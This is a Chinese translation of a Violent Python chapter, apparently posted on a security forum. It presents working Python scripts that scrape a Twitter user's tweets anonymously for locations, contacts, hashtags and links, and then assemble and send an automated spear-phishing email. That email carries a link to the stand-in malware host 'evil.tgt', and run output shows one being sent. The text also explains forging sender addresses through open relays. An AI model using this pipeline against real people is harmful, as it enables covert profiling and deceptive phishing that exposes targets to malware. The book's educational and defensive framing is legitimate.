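Violent Python, Chapter 6: Web Recon with Python (2), Chinese edition (translated by WooYun Python and English enthusiasts)

crown丶prince (I'll make your dreams come true with my own two hands) | 2015-11-01 12:40

Series introduction: http://zone.wooyun.org/content/23138

Original author: Chris Katsaropoulos

First translator: @草帽小子-DJ

Second translator: crown丶prince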

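Retrieving Location Data from Twitter

Many Twitter users follow an unwritten formula when composing a tweet to share with the world. Generally, the formula is: [the other Twitter user the message is directed at] + [the text of the message, often with a shortened link] + [hashtags]. Other information may be included as well, but outside the message body, such as an image or a location. Now take a step back and look at this formula through the eyes of an attacker. To a malicious user it becomes: [a person the user is interested in, which raises the chance the user will trust a message from that person] + [a link or subject the user is interested in, so other messages on that topic will also catch their attention] + [a trend or topic the user probably wants to learn more about]. Pictures and geotags are no longer helpful or amusing tidbits for friends. They become extra details for a profile, such as where someone often goes for breakfast. While this may be a paranoid view, we will now automatically collect this information from every tweet we retrieve.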

# coding=UTF-8
import json
import urllib
import optparse
from anonBrowser import *


def get_tweets(handle):
    # Search for every tweet (retweets included) sent from this handle.
    query = urllib.quote_plus('from:' + handle + ' since:2009-01-01 include:retweets')
    tweets = []
    browser = anonBrowser()
    browser.anonymize()
    response = browser.open('http://search.twitter.com/search.json?q=' + query)
    json_objects = json.load(response)
    # Keep only the author, the geotag and the text of each result.
    for result in json_objects['results']:
        new_result = {}
        new_result['from_user'] = result['from_user_name']
        new_result['geo'] = result['geo']
        new_result['tweet'] = result['text']
        tweets.append(new_result)
    return tweets


def load_cities(cityFile):
    # One city per line, lower-cased for case-insensitive matching.
    cities = []
    for line in open(cityFile).readlines():
        city = line.strip('\n').strip('\r').lower()
        cities.append(city)
    return cities


def twitter_locate(tweets, cities):
    locations = []
    locCnt = 0
    cityCnt = 0
    tweetsText = ""
    for tweet in tweets:
        # Geotag attached to the tweet, if any.
        if tweet['geo'] != None:
            locations.append(tweet['geo'])
            locCnt += 1
        # Collect the text of every tweet, geotagged or not.
        tweetsText += tweet['tweet'].lower()
    # Look for each city name anywhere in the combined tweet text.
    for city in cities:
        if city in tweetsText:
            locations.append(city)
            cityCnt += 1
    # Report the totals once, after both searches have finished.
    print("[+] Found " + str(locCnt) + " locations via Twitter API and " + str(cityCnt) + " locations from text search.")
    return locations


def main():
    parser = optparse.OptionParser('usage %prog -u <twitter handle> [-c <list of cities>]')
    parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
    parser.add_option('-c', dest='cityFile', type='string', help='specify file containing cities to search')
    (options, args) = parser.parse_args()
    handle = options.handle
    cityFile = options.cityFile
    if handle == None:
        print(parser.usage)
        exit(0)
    # The city list is optional; without it only geotags are reported.
    cities = []
    if cityFile != None:
        cities = load_cities(cityFile)
    tweets = get_tweets(handle)
    locations = twitter_locate(tweets, cities)
    print("[+] Locations: " + str(locations))


if __name__ == '__main__':
    main()

To test our script, we build a list of cities.

recon:~# cat mlb-cities.txt | more
baltimore
boston
chicago
cleveland
detroit
<..SNIPPED..>
recon:~# python twitterGeo.py -u redsox -c mlb-cities.txt
[+] Found 0 locations via Twitter API and 1 locations from text search.
[+] Locations: ['toronto']
recon:~# python twitterGeo.py -u nationals -c mlb-cities.txt
[+] Found 0 locations via Twitter API and 1 locations from text search.
[+] Locations: ['denver']
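The text-search half of twitter_locate() is easy to try offline. What follows is only a minimal Python 3 sketch, not the script itself: the function name locate() and the sample tweets are made up for illustration. It collects any geotags, then looks for each city name as a plain substring of the combined tweet text.

```python
def locate(tweets, cities):
    """Return geotags plus any city names mentioned in the tweet text."""
    # Geotags attached to the tweets, if any.
    locations = [t['geo'] for t in tweets if t['geo'] is not None]
    # Combine the text of every tweet, lower-cased to match the city list.
    text = ' '.join(t['tweet'].lower() for t in tweets)
    # Plain substring search for each city name.
    locations += [city for city in cities if city in text]
    return locations


# Hypothetical sample data; none of these tweets carries a geotag.
tweets = [
    {'geo': None, 'tweet': 'Heading to Toronto for the series'},
    {'geo': None, 'tweet': 'Great win last night!'},
]
print(locate(tweets, ['boston', 'toronto', 'denver']))  # ['toronto']
```

Because the match is a plain substring test, a short city name can also match inside a longer word, so the results deserve a quick manual check.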

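Parsing Twitter Interests with Regular Expressions

Next we gather the target's interests, whether those are other users or Internet content. Any time a website offers a way to learn what a target cares about, jump on it: that data will form the basis of a successful social-engineering attack. As discussed earlier, the points of interest in a tweet are any links, hashtags, and other Twitter users it mentions. Finding them is a simple exercise in regular expressions.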

# coding=UTF-8
import json
import re
import urllib
import urllib2
import optparse
from anonBrowser import *


def get_tweets(handle):
    # Search for every tweet (retweets included) sent from this handle.
    query = urllib.quote_plus('from:' + handle + ' since:2009-01-01 include:retweets')
    tweets = []
    browser = anonBrowser()
    browser.anonymize()
    response = browser.open('http://search.twitter.com/search.json?q=' + query)
    json_objects = json.load(response)
    for result in json_objects['results']:
        new_result = {}
        new_result['from_user'] = result['from_user_name']
        new_result['geo'] = result['geo']
        new_result['tweet'] = result['text']
        tweets.append(new_result)
    return tweets


def find_interests(tweets):
    interests = {}
    interests['links'] = []
    interests['users'] = []
    interests['hashtags'] = []
    for tweet in tweets:
        text = tweet['tweet']
        # Try the space-terminated alternative first; with the \Z branch first,
        # the lazy match would run on to the end of the tweet.
        links = re.compile(r'(http.*?) |(http.*?)\Z').findall(text)
        for link in links:
            # findall returns one tuple per match; only one group is filled.
            if link[0]:
                link = link[0]
            elif link[1]:
                link = link[1]
            else:
                continue
            try:
                # Follow the shortened link to learn the full URL.
                response = urllib2.urlopen(link)
                full_link = response.url
                interests['links'].append(full_link)
            except Exception:
                pass
        interests['users'] += re.compile(r'(@\w+)').findall(text)
        interests['hashtags'] += re.compile(r'(#\w+)').findall(text)
    interests['users'].sort()
    interests['hashtags'].sort()
    interests['links'].sort()
    return interests


def main():
    parser = optparse.OptionParser('usage %prog -u <twitter handle>')
    parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
    (options, args) = parser.parse_args()
    handle = options.handle
    if handle == None:
        print(parser.usage)
        exit(0)
    tweets = get_tweets(handle)
    interests = find_interests(tweets)
    # set() removes duplicates before printing.
    print('\n[+] Links.')
    for link in set(interests['links']):
        print(' [+] ' + str(link))
    print('\n[+] Users.')
    for user in set(interests['users']):
        print(' [+] ' + str(user))
    print('\n[+] HashTags.')
    for hashtag in set(interests['hashtags']):
        print(' [+] ' + str(hashtag))


if __name__ == '__main__':
    main()

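Running our interest-parsing script, we see that it parses out the links, user names, and hashtags for our target. Note that it returns a YouTube video, a few user names, and the hashtag of an upcoming fight. The curious will once again know what to do with this.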

recon:~# python twitterInterests.py -u sonnench

[+] Links.
 [+] http://www.youtube.com/watch?v=K-BIuZtlC7k&feature=plcp

[+] Users.
 [+] @tomasseeger
 [+] @sonnench
 [+] @Benaskren
 [+] @AirFrayer
 [+] @NEXERSYS

[+] HashTags.
 [+] #UFC148

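Regular expressions are not the ideal way to find this information. The expression that grabs links from the text will miss certain kinds of URLs, because it is very difficult to match every possible URL format with a regular expression. For our purposes, however, it will work 99 percent of the time. Note also that the function opens the links with the urllib2 library rather than with our anonymous browser class.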
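To see both the convenience and the limits of this approach, here is a minimal Python 3 sketch run on an invented sample tweet. The user and hashtag patterns are the ones from the script; LINK_RE is a simplified stand-in chosen for this illustration (an assumption, not the script's exact pattern), and extract_interests() is a hypothetical helper name.

```python
import re

# User and hashtag patterns as in the script; LINK_RE is a simplified
# stand-in for illustration only.
LINK_RE = re.compile(r'(https?://\S+)')
USER_RE = re.compile(r'(@\w+)')
HASHTAG_RE = re.compile(r'(#\w+)')


def extract_interests(text):
    """Return the links, mentioned users and hashtags found in one tweet."""
    return {
        'links': LINK_RE.findall(text),
        'users': USER_RE.findall(text),
        'hashtags': HASHTAG_RE.findall(text),
    }


# Invented sample text; note the full stop right after the URL.
sample = 'Watch this @example_user http://example.com/clip. #demo'
found = extract_interests(sample)
print(found['links'])     # ['http://example.com/clip.']
print(found['users'])     # ['@example_user']
print(found['hashtags'])  # ['#demo']
```

The link comes back with the sentence's trailing full stop attached, which is exactly the kind of edge case that makes URL matching with regular expressions unreliable.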

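Once again, we use a dictionary to sort the information into a more manageable data structure, so that we do not have to create a new class. Because of Twitter's character limit, many URLs are shortened with one of several services. These shortened links are not very informative, since they could point anywhere. To expand them, we open each one with urllib2; once the script has opened the page, urllib2 can give us the full URL. Other users and hashtags are retrieved with very similar regular expressions, and the results are returned to the master twitter() method. Finally, the locations and interests are handed back to the caller.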
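The link-expansion step can be sketched in isolation. This is a minimal Python 3 version, assuming urllib.request in place of the script's urllib2; the function name expand_url() and the opener parameter (which lets a stand-in replace the real network call) are hypothetical additions for this illustration.

```python
import urllib.request
from contextlib import closing


def expand_url(short_url, opener=urllib.request.urlopen, timeout=10):
    """Return the final URL after any redirects, or None if the request fails."""
    try:
        # urlopen follows HTTP redirects; the response records where it ended up.
        with closing(opener(short_url, timeout=timeout)) as response:
            return response.url
    except Exception:
        # Unreachable or malformed links are simply skipped, as in the script.
        return None
```

Calling expand_url() on a shortened link would return the address it finally redirects to, or None when the link cannot be opened.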

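Much more can be done to extend our handling of Twitter. The virtually unlimited resources on the Internet, and the countless ways of analyzing that data, call for constantly expanding the capabilities of an automated information-gathering program.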

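To wrap up our whole series of recon against a Twitter user, we build a class that retrieves locations, interests, and tweets. It will prove useful in the next section.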

# coding=UTF-8
import urllib
from anonBrowser import *
import json
import re
import urllib2


class reconPerson:
    def __init__(self, handle):
        self.handle = handle
        # Tweets are fetched once, when the object is created.
        self.tweets = self.get_tweets()

    def get_tweets(self):
        query = urllib.quote_plus('from:' + self.handle + ' since:2009-01-01 include:retweets')
        tweets = []
        browser = anonBrowser()
        browser.anonymize()
        response = browser.open('http://search.twitter.com/search.json?q=' + query)
        json_objects = json.load(response)
        for result in json_objects['results']:
            new_result = {}
            new_result['from_user'] = result['from_user_name']
            new_result['geo'] = result['geo']
            new_result['tweet'] = result['text']
            tweets.append(new_result)
        return tweets

    def find_interests(self):
        interests = {}
        interests['links'] = []
        interests['users'] = []
        interests['hashtags'] = []
        for tweet in self.tweets:
            text = tweet['tweet']
            # Try the space-terminated alternative first; with the \Z branch
            # first, the lazy match would run on to the end of the tweet.
            links = re.compile(r'(http.*?) |(http.*?)\Z').findall(text)
            for link in links:
                if link[0]:
                    link = link[0]
                elif link[1]:
                    link = link[1]
                else:
                    continue
                try:
                    # Follow the shortened link to learn the full URL.
                    response = urllib2.urlopen(link)
                    full_link = response.url
                    interests['links'].append(full_link)
                except Exception:
                    pass
            interests['users'] += re.compile(r'(@\w+)').findall(text)
            interests['hashtags'] += re.compile(r'(#\w+)').findall(text)
        interests['users'].sort()
        interests['hashtags'].sort()
        interests['links'].sort()
        return interests

    def twitter_locate(self, cityFile):
        cities = []
        if cityFile != None:
            for line in open(cityFile).readlines():
                city = line.strip('\n').strip('\r').lower()
                cities.append(city)
        locations = []
        locCnt = 0
        cityCnt = 0
        tweetsText = ''
        for tweet in self.tweets:
            if tweet['geo'] != None:
                locations.append(tweet['geo'])
                locCnt += 1
            # Collect the text of every tweet, geotagged or not.
            tweetsText += tweet['tweet'].lower()
        for city in cities:
            if city in tweetsText:
                locations.append(city)
                cityCnt += 1
        return locations

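Anonymous Email

More and more often, websites require users to create an account and log in if they want access to the site's best resources. This obviously poses a problem: unlike ordinary browsing, logging in destroys anonymity, because every action taken after login is tied to the account. Most websites only require a valid email address and do not verify any other personal information. Email addresses from providers such as Yahoo and Google are free and easy to sign up for. However, they come with terms of service that you must accept and understand.

A good alternative to a permanent email address is a disposable one. Ten Minute Mail, at http://10minutemail.com/10MinuteMail/index.html, provides such a disposable mailbox. An attacker can use email addresses that are hard to trace to create accounts that are not tied to them either. Most websites have, at a minimum, terms of use that forbid gathering information about other users. Real attackers do not follow these rules, but applying the technique to your own accounts is enough to demonstrate the capability fully. Remember, though, that the same process can be used against you, and you should take steps to keep your accounts safe from it.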

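Mass Social Engineering

At this point we have gathered a large amount of valuable information about the target. Generating an email automatically from this information is a tricky exercise, especially when it comes to adding enough detail to make it believable. One option would be to have the program stop here and present everything it has found, which would let the attacker craft an email by hand using all the available information. However, manually emailing every person in a large organization is not feasible. The power of Python lets us automate the process and get results quickly. For our purposes, we will build a very simple email from the gathered information and send it to the target.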

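Using Smtplib to Email Targets

Sending an email normally means opening your client of choice, clicking New, and then clicking Send. Behind the scenes, the client connects to the server, possibly logs in, and exchanges information about the sender, the recipient, and other necessary data. Python's smtplib library handles this process inside our program. We will build a Python email client to send our malicious emails to the target. The client is very basic, but it makes sending email from the rest of our program simple. For our purposes here we use Google's Gmail SMTP server: you will need to create a Gmail account to use in the script, or change the settings to use your own SMTP server.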

import smtplib
from email.mime.text import MIMEText


def sendMail(user, pwd, to, subject, text):
    # Build a plain-text message with the usual headers.
    msg = MIMEText(text)
    msg['From'] = user
    msg['To'] = to
    msg['Subject'] = subject
    try:
        smtpServer = smtplib.SMTP('smtp.gmail.com', 587)
        print("[+] Connecting To Mail Server.")
        smtpServer.ehlo()
        print("[+] Starting Encrypted Session.")
        # Upgrade the connection to TLS, then greet the server again.
        smtpServer.starttls()
        smtpServer.ehlo()
        print("[+] Logging Into Mail Server.")
        smtpServer.login(user, pwd)
        print("[+] Sending Mail.")
        smtpServer.sendmail(user, to, msg.as_string())
        smtpServer.close()
        print("[+] Mail Sent Successfully.")
    except Exception:
        print("[-] Sending Mail Failed.")


user = 'username'
pwd = 'password'
sendMail(user, pwd, 'target@tgt.tgt', 'Re: Important', 'Test Message')

Running the script and checking the inbox, we see that the email was sent successfully.

recon:# python sendMail.py
[+] Connecting To Mail Server.
[+] Starting Encrypted Session.
[+] Logging Into Mail Server.
[+] Sending Mail.
[+] Mail Sent Successfully.
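It can help to look at what the client actually hands to the server. The following minimal Python 3 sketch only builds the message and prints it, without connecting anywhere; build_message() is a hypothetical helper and the addresses are placeholders.

```python
from email.mime.text import MIMEText


def build_message(sender, recipient, subject, body):
    """Build a plain-text email; nothing is sent."""
    msg = MIMEText(body)
    msg['From'] = sender
    msg['To'] = recipient
    msg['Subject'] = subject
    return msg


# Placeholder addresses for illustration only.
msg = build_message('sender@example.com', 'recipient@example.com',
                    'Re: Important', 'Test Message')
# as_string() yields the headers, a blank line, then the body: this is the
# text that sendmail() transmits.
print(msg.as_string())
```

The From, To, and Subject lines are ordinary headers inside that text, set by whoever builds the message.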

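Given a valid mail server and parameters, this client will correctly deliver an email to the target. Many mail servers, however, are not open relays, and will only deliver mail to specific addresses. An open relay set up on a local mail server, or any open relay on the Internet, will send email from any address to any address. The sender's address does not even have to be valid.

Spammers use the same technique to send email that appears to come from Potus@whitehouse.gov. Since few people open email from a suspicious address, the ability to forge the sender's address is key. Using our client together with an open relay lets an attacker send email from an address that looks trustworthy, which increases the likelihood that the user opens it.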
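Seen from the receiving side, a forged sender is sometimes visible in the headers. The sketch below is a rough Python 3 heuristic under stated assumptions, not a real anti-spoofing check: it compares the domain of the From header with the domain of the Return-Path header that receiving servers commonly add. The function name and the sample message are invented for illustration, and production systems rely on mechanisms such as SPF, DKIM, and DMARC instead.

```python
from email import message_from_string
from email.utils import parseaddr


def _domain(header_value):
    """Extract the lower-cased domain from an address header, or ''."""
    address = parseaddr(header_value)[1]
    return address.rpartition('@')[2].lower() if '@' in address else ''


def from_matches_return_path(raw_message):
    """Return True when the From and Return-Path domains agree."""
    msg = message_from_string(raw_message)
    from_domain = _domain(msg.get('From', ''))
    return_domain = _domain(msg.get('Return-Path', ''))
    return bool(from_domain) and from_domain == return_domain


# Invented sample message: the visible sender and the bounce address differ.
raw = (
    'Return-Path: <bounce@relay.example.net>\n'
    'From: Potus@whitehouse.gov\n'
    'To: target@tgt.tgt\n'
    'Subject: Re: Important\n'
    '\n'
    'Test Message\n'
)
print(from_matches_return_path(raw))  # False
```

A mismatch is only a hint, since legitimate mailing lists and forwarding services also produce one.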

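Spear Phishing with Smtplib

We are finally at the stage where all our research comes together. Here our script creates an email that looks as if it came from a friend of the target, contains things the target finds interesting, and reads as if a real person wrote it. A great deal of research has gone into making computers communicate more like people, and the various techniques are still far from perfect. To reduce the chance that the message sounds machine-written, we create a very simple message that carries our payload. Several parts of the program involve choosing which piece of information to include, and our program makes those choices at random from the data it has. The steps are: choose the fake sender address, craft a subject, create the message body, and send the email. Fortunately, creating the sender and the subject is fairly straightforward.

The code then becomes a matter of handling the if statements carefully and joining the sentences into a short, coherent message. When a huge number of possibilities is involved, as would be the case if our recon code used more sources, each possibility would be broken out into its own method. Each method would be responsible for starting and ending its piece in a particular way and would operate independently of the rest of the code. That way, as more information about someone is gathered, only that method has to change. The last step is to send the message through our email client and trust human gullibility to do the rest. One part of this process that is not discussed in this chapter is the creation of whatever exploit or phishing site is used to gain access. In our example we simply send a misleadingly named link, but the payload could be an attachment, a scam website, or any other attack method. The process is then repeated for every member of the organization, and it takes only one person falling for it to give the attacker access.

Our specific script targets a user based on the information he or she leaves publicly available. From the locations, users, hashtags, and links it finds, the script creates an email containing a malicious link and waits for the user to click.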

# coding=UTF-8
import smtplib
import optparse
from email.mime.text import MIMEText
from twitterClass import *
from random import choice


def sendMail(user, pwd, to, subject, text):
    # Build a plain-text message with the usual headers.
    msg = MIMEText(text)
    msg['From'] = user
    msg['To'] = to
    msg['Subject'] = subject
    try:
        smtpServer = smtplib.SMTP('smtp.gmail.com', 587)
        print("[+] Connecting To Mail Server.")
        smtpServer.ehlo()
        print("[+] Starting Encrypted Session.")
        smtpServer.starttls()
        smtpServer.ehlo()
        print("[+] Logging Into Mail Server.")
        smtpServer.login(user, pwd)
        print("[+] Sending Mail.")
        smtpServer.sendmail(user, to, msg.as_string())
        smtpServer.close()
        print("[+] Mail Sent Successfully.")
    except Exception:
        print("[-] Sending Mail Failed.")


def main():
    parser = optparse.OptionParser('usage %prog -u <twitter target> -t <target email> -l <gmail login> -p <gmail password>')
    parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
    parser.add_option('-t', dest='tgt', type='string', help='specify target email')
    parser.add_option('-l', dest='user', type='string', help='specify gmail login')
    parser.add_option('-p', dest='pwd', type='string', help='specify gmail password')
    (options, args) = parser.parse_args()
    handle = options.handle
    tgt = options.tgt
    user = options.user
    pwd = options.pwd
    if handle == None or tgt == None or user == None or pwd == None:
        print(parser.usage)
        exit(0)
    print("[+] Fetching tweets from: " + str(handle))
    # The reconPerson constructor fetches the tweets.
    spamTgt = reconPerson(handle)
    print("[+] Fetching interests from: " + str(handle))
    interests = spamTgt.find_interests()
    print("[+] Fetching location information from: " + str(handle))
    location = spamTgt.twitter_locate('mlb-cities.txt')
    spamMsg = "Dear " + tgt + ","
    # Each list may be empty, and choice() fails on an empty list,
    # so test for content rather than for None.
    if location:
        randLoc = choice(location)
        spamMsg += " Its me from " + randLoc + "."
    if interests['users']:
        randUser = choice(interests['users'])
        spamMsg += " " + randUser + " said to say hello."
    if interests['hashtags']:
        randHash = choice(interests['hashtags'])
        spamMsg += " Did you see all the fuss about " + randHash + "?"
    if interests['links']:
        randLink = choice(interests['links'])
        spamMsg += " I really liked your link to: " + randLink + "."
    spamMsg += " Check out my link to http://evil.tgt/malware"
    print("[+] Sending Msg: " + spamMsg)
    sendMail(user, pwd, tgt, 'Re: Important', spamMsg)


if __name__ == '__main__':
    main()
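One detail of the script above is worth checking. find_interests() and twitter_locate() return lists, an empty list is not None, and random.choice raises IndexError on an empty sequence. A minimal Python 3 sketch of a guard follows; pick() is a hypothetical helper, not part of the book's code.

```python
from random import choice


def pick(items):
    """Return a random element, or None when there is nothing to pick."""
    return choice(items) if items else None


print(pick([]))           # None
print(pick(['#UFC148']))  # #UFC148
```

Testing the list for content, rather than comparing it with None, lets the script skip a sentence when that kind of information was not found.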

To test our script, we see whether we can gather enough information about the Boston Red Sox from their Twitter account to send a malicious spam email.

recon# python sendSpam.py -u redsox -t target@tgt -l username -p password
[+] Fetching tweets from: redsox
[+] Fetching interests from: redsox
[+] Fetching location information from: redsox
[+] Sending Msg: Dear redsox, Its me from toronto. @davidortiz said to say hello. Did you see all the fuss about #SoxAllStars? I really liked your link to: http://mlb.mlb.com. Check out my link to http://evil.tgt/malware
[+] Connecting To Mail Server.
[+] Starting Encrypted Session.
[+] Logging Into Mail Server.
[+] Sending Mail.
[+] Mail Sent Successfully.

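Chapter Summary

Although this method should never be used against another person or organization, it is important to recognize that it is viable and to know how vulnerable your own organization is. Python and other scripting languages let programmers quickly build ways to exploit the vast resources found on the Internet for potential gain. In our code we created a class that mimics a browser while adding anonymity, scraped a website, used the power of Google, leveraged Twitter to learn more about a target, and finally brought all those details together in a specially crafted email sent to the target. The speed of the Internet connection limits the program, so threading certain functions would greatly reduce execution time. Moreover, once we have learned how to retrieve information from one data source, doing the same for other websites is fairly simple. No individual has the capacity to access and process the massive amount of information on the Internet, but Python and its libraries can reach every resource far faster than several skilled researchers could. Knowing all this, and knowing that the attack is not as sophisticated as you might have imagined, how vulnerable is your organization? What publicly available information could an attacker use? Could you become the victim of a Python script that scrapes information and sends malicious email?

Translators' note:

Tune in at the same time next week for the final chapter of Violent Python! At the end we will also share the draft of our translation of the whole book, so stay tuned!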